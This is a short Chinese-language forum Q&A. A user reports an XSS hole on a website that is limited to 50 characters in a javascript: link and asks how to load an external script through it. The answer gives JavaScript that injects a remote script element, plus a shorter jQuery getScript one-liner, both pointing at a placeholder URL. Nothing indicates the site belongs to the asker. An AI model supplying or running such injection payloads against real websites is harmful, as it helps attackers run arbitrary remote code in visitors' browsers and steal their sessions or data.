我在一个网站上发现了一个 xss 漏洞,但它只允许<a href=javascript:alert(1)>. 问题是它只接受 50 个字符。我的问题:我可以从获取脚本的地方以类似的方式添加源代码吗?javascript:script.src=and here the source of my code
1 回答
PIPIONE
TA贡献1829条经验 获得超9个赞
有人可以像这样加载外部脚本,但它有 50 多个字符 let s = document.createElement("script"); s.src = "url"; document.head.appendChild(s);
如果你有 JQuery,代码会更小: $.getScript("url");
添加回答
举报
0/150
提交
取消